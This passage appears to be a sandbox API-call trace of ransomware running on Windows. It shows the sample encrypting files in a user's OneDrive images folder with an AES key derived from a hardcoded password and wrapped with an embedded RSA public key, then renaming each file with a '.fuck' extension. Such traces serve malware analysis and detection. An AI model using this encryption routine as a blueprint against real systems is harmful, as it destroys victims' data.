pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.930] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.930] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d2d0) returned 1 [0277.931] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d2d0, dwCertEncodingType=0x1, pInfo=0x2f37640*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37670*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37678*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbb08) returned 1 [0277.931] CryptEncrypt (in: hKey=0x2fbb08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.931] CryptEncrypt (in: hKey=0x2fbb08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d468*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d468*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d468*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d468*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.934] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x1ef, lpOverlapped=0x0) returned 1 [0277.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x1ef, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x1f0) returned 1 [0277.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x1f0, lpOverlapped=0x0) returned 1 [0277.935] CloseHandle (hObject=0x5d48) returned 1 [0277.936] CloseHandle (hObject=0x5d3c) returned 1 [0277.936] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg"), bFailIfExists=0) returned 1 [0277.939] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg", dwFileAttributes=0x0) returned 1 [0277.939] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg")) returned 1 [0277.940] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg.fuck")) returned 1 [0277.942] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.942] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.942] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.942] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.942] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.942] GetLastError () returned 0x0 [0277.943] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg")) returned 0x20 [0277.943] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg", dwFileAttributes=0x80) returned 1 [0277.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.945] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.946] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.946] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.949] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.949] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.949] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.949] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.949] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.949] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.949] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2df08) returned 1 [0277.949] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2df08, dwCertEncodingType=0x1, pInfo=0x2f37bf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37c20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37c28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc048) returned 1 [0277.950] CryptEncrypt (in: hKey=0x2fc048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.950] CryptEncrypt (in: hKey=0x2fc048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2de80*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2de80*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.950] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2de80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2de80*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.962] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.963] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.965] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0xb4, lpOverlapped=0x0) returned 1 [0277.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0xb4, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0xc0) returned 1 [0277.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0xc0, lpOverlapped=0x0) returned 1 [0277.967] CloseHandle (hObject=0x5d3c) returned 1 [0277.967] CloseHandle (hObject=0x5d48) returned 1 [0277.968] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg"), bFailIfExists=0) returned 1 [0277.970] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg", dwFileAttributes=0x0) returned 1 [0277.971] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg.gsg")) returned 1 [0277.972] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\signIn.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\signin.svg.fuck")) returned 1 [0277.973] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.973] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.973] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.973] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.973] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.973] GetLastError () returned 0x0 [0277.973] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg")) returned 0x20 [0277.974] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg", dwFileAttributes=0x80) returned 1 [0277.974] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.975] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.976] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.976] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.978] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.978] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.978] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.978] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.978] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.978] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.978] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 